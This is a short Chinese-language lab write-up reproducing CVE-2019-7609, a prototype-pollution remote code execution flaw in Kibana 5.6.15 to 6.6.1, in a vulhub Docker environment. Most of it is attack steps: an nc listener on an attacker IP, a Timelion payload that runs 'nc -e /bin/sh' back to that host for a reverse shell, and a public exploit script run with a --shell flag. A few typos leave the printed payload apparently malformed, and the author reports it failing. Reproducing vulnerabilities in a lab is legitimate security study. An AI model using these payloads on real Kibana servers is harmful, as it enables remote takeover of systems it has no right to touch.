一、漏洞描述
Kibana为 Elassticsearch设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在自标服务器上执行任意Javascript代码。
二、影响版本
5.6.15<=Kibana<=6.6.1
三、环境搭建
cd /root/vulhub/kibana/CVE-2019-7609
systcl -w vm.max_map_count=262144 //启动环境前,修改文件句柄的大小为262144
docker-compose up -d
docker ps
四、漏洞复现1、端口监听
在攻击机 192.168.20.143上监听端口
nc -lvvp 6666
2、攻击利用
访问: http://192.168.21.6:5601/app/timelion
在Timelion处,填入payload
.es(*).props(label.proto_.env.AAAA='require("child_process").exec("nc -e /bin/sh 192.168.20.143 6666");process.exit()//').props(label.proto_.env.NODE_OPTIONS='--require /proc/self/environ'
方法不成功,换个方法。
3、更换方法 使用exploit工具
工具:
https://github.com/mpgn/CVE-2019-7609
python CVE-2019-7609-kibana-rce.py -u 192.168.21.6:5601 -host 192.168.20.143 -port 6666 --shell
4、反弹成功
五、漏洞修复
升级Kibana到最新版本